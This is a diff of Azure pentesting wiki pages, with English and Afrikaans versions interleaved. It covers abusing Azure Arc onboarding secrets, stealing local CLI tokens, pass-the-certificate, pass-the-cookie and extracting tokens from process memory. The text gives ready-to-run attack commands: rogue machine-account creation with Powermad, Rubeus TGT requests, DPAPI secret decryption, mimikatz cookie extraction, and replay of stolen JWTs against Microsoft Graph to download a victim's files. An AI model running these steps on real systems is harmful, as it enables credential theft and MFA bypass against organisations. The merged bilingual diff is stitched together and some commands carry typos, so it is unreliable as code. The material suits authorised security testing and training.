2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
1. Skep die Azure Arc Servers Onboarding GPO binne die plaaslike domein.
2. Kopieer die EnableAzureArc.ps1 aanmeldskrip na die aangewese netwerkdeel wat geskep is vir die aanmeldproses, wat ook die Windows installer pakket bevat.
When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
Wanneer hierdie skrip uitgevoer word, moet stelselsadmins twee hoofparameters verskaf: **ServicePrincipalId** en **ServicePrincipalClientSecret**. Daarbenewens vereis dit ander parameters soos die domein, die FQDN van die bediener wat die deel huisves, en die deelnaam. Verdere besonderhede soos die tenant ID, hulpbron groep, en ander nodige inligting moet ook aan die skrip verskaf word.
'n Geënkripteerde geheim word in die AzureArcDeploy gids op die gespesifiseerde deel gegenereer met behulp van DPAPI-NG enkripsie. Die geënkripteerde geheim word in 'n lêer genaamd encryptedServicePrincipalSecret gestoor. Bewyse hiervan kan in die DeployGPO.ps1 skrip gevind word, waar die enkripsie uitgevoer word deur ProtectBase64 met $descriptor en $ServicePrincipalSecret as insette aan te roep. Die descriptor bestaan uit die Domein Rekenaar en Domein Beheerder groep SIDs, wat verseker dat die ServicePrincipalSecret slegs deur die Domein Beheerders en Domein Rekenaar sekuriteitsgroepe ontkripteer kan word, soos opgemerk in die skrip kommentaar.
```powershell
# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
$DomainComputersSID = "SID=" + $DomainComputersSID
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
Import-Module $PSScriptRoot\AzureArcDeployment.psm1
$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
```
### Exploit
We have the follow conditions:
Ons het die volgende toestande:
1. We have successfully penetrated the internal network.
2. We have the capability to create or assume control of a computer account within Active Directory.
3. We have discovered a network share containing the AzureArcDeploy directory.
There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
1. Ons het suksesvol die interne netwerk binnegedring.
2. Ons het die vermoë om 'n rekenaarrekening binne Active Directory te skep of te beheer.
3. Ons het 'n netwerkdeel ontdek wat die AzureArcDeploy-gids bevat.
Daar is verskeie metodes om 'n masjienrekening binne 'n AD-omgewing te verkry. Een van die mees algemene is om die masjienrekeningkwota te benut. 'n Ander metode behels die kompromittering van 'n masjienrekening deur kwesbare ACL's of verskeie ander miskonfigurasies.
```powershell
Import-MKodule powermad
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```
Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
Sodra 'n masjienrekening verkry is, is dit moontlik om te autentiseer met hierdie rekening. Ons kan of die runas.exe-opdrag met die netonly-vlag gebruik of pass-the-ticket met Rubeus.exe gebruik.
```powershell
runas /user:fake01$ /netonly powershell
```
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
```powershell
.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
```
By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
Deur die TGT vir ons rekenaarrekening in geheue te stoor, kan ons die volgende skrip gebruik om die dienshoofsekrte te ontsleutel.
```powershell
Import-Module .\AzureArcDeployment.psm1
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
$ebs
```
Alternatiewelik kan ons [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG) gebruik.
Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
Op hierdie punt kan ons die oorblywende inligting versamel wat nodig is om met Azure te verbind vanaf die ArcInfo.json-lêer, wat op dieselfde netwerkdeel as die encryptedServicePrincipalSecret-lêer gestoor is. Hierdie lêer bevat besonderhede soos: TenantId, servicePrincipalClientId, ResourceGroup, en meer. Met hierdie inligting kan ons Azure CLI gebruik om as die gecompromitteerde dienshoof te autentiseer.
## References
- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
{{#include ../../../banners/hacktricks-training.md}}

44
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
View File

@@ -1,43 +1,39 @@
# Az - Local Cloud Credentials
# Az - Plaaslike Wolk Krediete
{{#include ../../../banners/hacktricks-training.md}}
## Local Token Storage and Security Considerations
## Plaaslike Token Berging en Sekuriteits oorwegings
### Azure CLI (Command-Line Interface)
### Azure CLI (Opdraglyn Koppelvlak)
Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
Tokens en sensitiewe data word plaaslik deur Azure CLI gestoor, wat sekuriteits bekommernisse oproep:
1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
- Executed commands with credentials embedded.
- URLs accessed using tokens, potentially revealing sensitive information.
1. **Toegangstokens**: Gestoor in platte teks binne `accessTokens.json` geleë by `C:\Users\<username>\.Azure`.
2. **Subskripsie Inligting**: `azureProfile.json`, in dieselfde gids, hou subskripsie besonderhede.
3. **Loglêers**: Die `ErrorRecords` vouer binne `.azure` mag loglêers bevat met blootgestelde krediete, soos:
- Uitgevoerde opdragte met krediete ingebed.
- URL's wat met tokens toeganklik gemaak is, wat moontlik sensitiewe inligting kan onthul.
### Azure PowerShell
Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
Azure PowerShell stoor ook tokens en sensitiewe data, wat plaaslik toeganklik is:
1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
1. **Toegangstokens**: `TokenCache.dat`, geleë by `C:\Users\<username>\.Azure`, stoor toegangstokens in platte teks.
2. **Diens Prinsipaal Geheimen**: Hierdie word ongeënkripteer in `AzureRmContext.json` gestoor.
3. **Token Stoor Funksie**: Gebruikers het die vermoë om tokens te behou met die `Save-AzContext` opdrag, wat versigtig gebruik moet word om ongeoorloofde toegang te voorkom.
## Automatic Tools to find them
## Outomatiese Gereedskap om hulle te vind
- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
## Security Recommendations
## Sekuriteits Aanbevelings
Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
Aangaande die berging van sensitiewe data in platte teks, is dit noodsaaklik om hierdie lêers en gidse te beveilig deur:
- Limiting access rights to these files.
- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
- Employing encryption for sensitive files where possible.
- Educating users about the risks and best practices for handling such sensitive information.
- Toegangregte tot hierdie lêers te beperk.
- Gereeld hierdie gidse te monitor en te oudit vir ongeoorloofde toegang of onverwagte veranderinge.
- Enkripsie vir sensitiewe lêers waar moontlik toe te pas.
- Gebruikers op te voed oor die risiko's en beste praktyke vir die hantering van sulke sensitiewe inligting.
{{#include ../../../banners/hacktricks-training.md}}

36
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
View File

@@ -4,40 +4,32 @@
## Pass the Certificate (Azure)
In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
In Azure-verbonden masjiene is dit moontlik om van een masjien na 'n ander te autentiseer met behulp van sertifikate wat **uitgereik moet word deur Azure AD CA** vir die vereiste gebruiker (as die onderwerp) wanneer beide masjiene die **NegoEx** autentifikasiemeganisme ondersteun.
In super simplified terms:
In super vereenvoudigde terme:
- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
- Die masjien (klient) wat die verbinding begin **het 'n sertifikaat van Azure AD vir 'n gebruiker** nodig.
- Klient skep 'n JSON Web Token (JWT) kop wat PRT en ander besonderhede bevat, teken dit met behulp van die Afgeleide sleutel (met die sessiesleutel en die sekuriteitskonteks) en **stuur dit na Azure AD**.
- Azure AD verifieer die JWT-handtekening met behulp van die klient se sessiesleutel en sekuriteitskonteks, kontroleer die geldigheid van PRT en **antwoord** met die **sertifikaat**.
In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
In hierdie scenario en nadat al die inligting wat nodig is vir 'n [**Pass the PRT**](pass-the-prt.md) aanval verkry is:
- Username
- Tenant ID
- Gebruikersnaam
- Huurder ID
- PRT
- Security context
- Derived Key
It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
- Sekuriteitskonteks
- Afgeleide Sleutel
Dit is moontlik om 'n **P2P-sertifikaat** vir die gebruiker aan te vra met die hulpmiddel [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
```bash
RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
```
The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
Die sertifikate sal so lank duur as die PRT. Om die sertifikaat te gebruik, kan jy die python hulpmiddel [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) gebruik wat **authentiseer** na die afstandmasjien, **PSEXEC** uitvoer en 'n **CMD** op die slagoffer masjien oopmaak. Dit sal ons toelaat om Mimikatz weer te gebruik om die PRT van 'n ander gebruiker te verkry.
```bash
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
```
## Verwysings
## References
- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
- Vir meer besonderhede oor hoe Pass the Certificate werk, kyk na die oorspronklike pos [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
View File

@@ -2,40 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
## Why Cookies?
## Waarom Koekies?
Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
Bladsy **koekies** is 'n uitstekende meganisme om **authentisering en MFA** te **omseil**. Omdat die gebruiker reeds in die toepassing geverifieer is, kan die sessie **koekie** net gebruik word om **data** as daardie gebruiker te **toegang**, sonder om weer te verifieer.
You can see where are **browser cookies located** in:
Jy kan sien waar **bladsy koekies geleë** is in:
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
{{#endref}}
## Attack
## Aanval
The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
Die uitdagende deel is dat daardie **koekies geënkripteer** is vir die **gebruiker** via die Microsoft Data Protection API (**DPAPI**). Dit is geënkripteer met kriptografiese [sleutels wat aan die gebruiker gekoppel is](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) waartoe die koekies behoort. Jy kan meer inligting hieroor vind in:
{{#ref}}
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
{{#endref}}
With Mimikatz in hand, I am able to **extract a users cookies** even though they are encrypted with this command:
Met Mimikatz in die hand, kan ek **'n gebruiker se koekies** onttrek, selfs al is hulle geënkripteer met hierdie opdrag:
```bash
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
```
Vir Azure, is ons bekommerd oor die outentikasie koekies insluitend **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, en **`ESTSAUTHLIGHT`**. Daardie is daar omdat die gebruiker onlangs aktief op Azure was.
For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
Net navigeer na login.microsoftonline.com en voeg die koekie **`ESTSAUTHPERSISTENT`** (gegenereer deur die “Bly Teken In” opsie) of **`ESTSAUTH`** by. En jy sal outentiseer wees.
## References
- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
{{#include ../../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
View File

@@ -1,11 +1,7 @@
# Az - Phishing Primary Refresh Token (Microsoft Entra)
# Az - Phishing Primêre Vernuwings Teken (Microsoft Entra)
{{#include ../../../banners/hacktricks-training.md}}
**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
**Kontroleer:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
{{#include ../../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
View File

@@ -1,11 +1,7 @@
# Az - Primary Refresh Token (PRT)
# Az - Primêre Vernuwings Teken (PRT)
{{#include ../../../banners/hacktricks-training.md}}
**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
**Kyk na die pos in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) alhoewel 'n ander pos wat dieselfde verduidelik, gevind kan word in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
View File

@@ -2,16 +2,15 @@
{{#include ../../../banners/hacktricks-training.md}}
## **Basic Information**
## **Basiese Inligting**
As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), sommige Microsoft sagteware wat met die wolk gesinkroniseer is (Excel, Teams...) mag **toegangstokens in duidelike teks in geheue stoor**. So net **dumping** die **geheue** van die proses en **grepping vir JWT tokens** mag jou toegang gee tot verskeie hulpbronne van die slagoffer in die wolk terwyl jy MFA omseil.
Steps:
1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
3. Find the tokens that interest you the most and run tools over them:
Stappe:
1. Dump die excel prosesse wat gesinkroniseer is met die EntraID gebruiker met jou gunsteling hulpmiddel.
2. Voer in: `string excel.dmp | grep 'eyJ0'` en vind verskeie tokens in die uitvoer
3. Vind die tokens wat jou die meeste interesseer en voer hulpmiddels oor hulle uit:
```bash
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sit
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
```
**Note that these kind of access tokens can be also found inside other processes.**
**Let daarop dat hierdie tipe toegangstokens ook binne ander prosesse gevind kan word.**
{{#include ../../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
View File

@@ -1,11 +1,7 @@
# Az - Permissions for a Pentest
# Az - Toestemmings vir 'n Pentest
{{#include ../../banners/hacktricks-training.md}}
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
Om die toetse te begin, moet jy toegang hê met 'n gebruiker met **Leser toestemmings oor die subskripsie** en **Globale Leser rol in AzureAD**. As jy selfs in daardie geval **nie in staat is om toegang te verkry tot die inhoud van die Stoor rekeninge** nie, kan jy dit regstel met die **rol Stoor Rekening Bydraer**.
{{#include ../../banners/hacktricks-training.md}}